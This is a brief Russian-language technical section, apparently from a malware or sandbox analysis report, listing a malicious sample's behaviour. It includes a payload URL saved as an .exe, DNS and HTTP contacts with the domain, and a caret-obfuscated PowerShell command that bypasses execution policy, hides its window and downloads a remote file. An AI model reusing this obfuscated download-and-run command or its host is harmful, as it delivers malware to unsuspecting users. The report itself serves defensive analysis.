Техническая информация
- http://asecwitlecn.bid/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PO^WeR^shEl^L.E^x^e ^-EX^ECUT^i^onpoLi^c^Y^ b^yp^ASs^ ^-noPr^o^FIL^e^ ^-^w^I^N^doWs^Tyl^E hiD^dEN^ ^(nE^W^-OB^JecT SyStem.^net^.WEbCliEn^t^).^DOWnload^FILE(^'http://asecwitlecn...
- 'as###itlecn.bid':80
- http://as###itlecn.bid/read.php?f=#####
- DNS ASK as###itlecn.bid
- '<SYSTEM32>\cmd.exe' /C "PO^WeR^shEl^L.E^x^e ^-EX^ECUT^i^onpoLi^c^Y^ b^yp^ASs^ ^-noPr^o^FIL^e^ ^-^w^I^N^doWs^Tyl^E hiD^dEN^ ^(nE^W^-OB^JecT SyStem.^net^.WEbCliEn^t^).^DOWnload^FILE(^'http://asecwitlecn...' (со скрытым окном)